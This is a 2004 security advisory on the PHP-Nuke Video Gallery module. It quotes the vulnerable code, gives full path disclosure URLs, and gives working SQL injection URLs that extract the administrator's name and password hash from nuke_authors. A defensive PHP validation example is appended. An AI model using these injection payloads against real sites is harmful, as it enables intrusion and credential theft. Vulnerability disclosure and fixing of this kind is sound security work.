`Advisory: http://bichosoft.webcindario.com/advisory-03.txt
===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================
PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
HOMEPAGE: http://videogallery.engorile.com/
VERSION: 0.1 Beta 5
BUG: Multiple vulnerabilities
DATE: 26/04/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: [email protected]
===========================================================================
===========================================================================
Vulnerabilities:
---------------
1.- CODE:
¨¨¨¨
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
    global $prefix, $dbi, $module_name;
    $tipomime="application/unknown";
    $next=next_clips($clipid, $catid);
    // $clipid is interpolated into the query unquoted, with no validation in this function (see section 3)
    $result=sql_query("select descripcion, url_thumb, url_preview, accesos from ".$prefix."_videos_clips where clipid=$clipid", $dbi);
    // When the query fails, the fetch below is handed an invalid result (see section 2)
    list($descripcion, $url_thumb, $url_preview, $accesos)=sql_fetch_row($result, $dbi);
    $resultado=AbreTabla();
    // Previous / next navigation links
    if ($next["previous"]){
        $resultado.="<a href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";
    }
    $resultado.="</td><td align=right>";
    if ($next["next"]){
        $resultado.="<a href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";
    }
    $resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";
    // Embed the preview video if there is one, otherwise show the thumbnail
    if ($url_preview != ""){
        $tipomime=tipomime($clipid, "clips");
        $result2=sql_query("select class_id, options_object, options_embed from ".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
        list($class_id, $options_object, $options_embed)=sql_fetch_row($result2, $dbi);
        $resultado.="<center>".mete_video($url_preview, $tipomime, 160, 120)."</center>";
    }
    else{
        $resultado.="<center><img src=\"$url_thumb\"></center>";
    }
    $resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
    if (count_total($clipid, "clip", "ficheros") > 0){
        $resultado.=CierraTabla().AbreTabla().clip_files($clipid, $catid).CierraTabla();
    }
    else{
        $resultado.=CierraTabla();
    }
    // Access counter update: $clipid is interpolated unquoted here as well
    $accesos++;
    sql_query("update ".$prefix."_videos_clips set accesos=$accesos where clipid=$clipid", $dbi);
    return "$resultado";
}
=========================================================================
2.- Full path disclosure:
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286
B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286
3.- SQL injection:
¨¨¨¨¨¨¨¨¨¨¨¨¨¨
This SQL injection can be used to extract any information from the
database, for example the superadmin's username and the MD5 hash of
the password:
A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
C)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
D)
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
`
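One way to close both issues at the input boundary, shown as an added example that is not the module's code or the vendor's fix: the clipid value is accepted only when it is a plain non-negative integer, so the strings from sections 2 and 3 never reach the query. The helpers vg_int_param() and vg_clip_query() are hypothetical names, and the 'nuke' prefix and sample inputs are constructed for the demonstration.

```php
<?php
// Added example. vg_int_param() and vg_clip_query() are hypothetical helpers,
// not functions of PHP-Nuke or of the Video Gallery module.

/**
 * Return $value as a non-negative integer, or null if it is anything else.
 */
function vg_int_param($value)
{
    // ctype_digit() accepts only strings made entirely of 0-9, so
    // "darkbicho" and "-1 UNION SELECT ..." are both refused.
    if (!is_string($value) || $value === '' || !ctype_digit($value)) {
        return null;
    }
    return (int) $value;
}

/**
 * Build the clip lookup from section 1 only when clipid is a plain integer.
 * Returns the SQL string, or null when the request must be rejected.
 */
function vg_clip_query($prefix, $clipid)
{
    $id = vg_int_param($clipid);
    if ($id === null) {
        return null;
    }
    // Only the validated integer is concatenated, never the raw parameter.
    return "select descripcion, url_thumb, url_preview, accesos from "
         . $prefix . "_videos_clips where clipid=" . $id;
}

// Constructed inputs modelled on the request shapes in sections 2 and 3.
$samples = array('7', 'darkbicho', '-1 UNION SELECT pwd FROM nuke_authors', '');
foreach ($samples as $s) {
    $sql = vg_clip_query('nuke', $s);   // 'nuke' prefix is an assumption
    echo str_pad(var_export($s, true), 45), ' => ',
         ($sql === null ? 'rejected' : $sql), "\n";
}
```

Because a rejected value never produces a failing query, the fetch call is not handed an invalid result, which is the condition that printed the path in section 2. The same check applies to catid in the viewcat and voteclip operations.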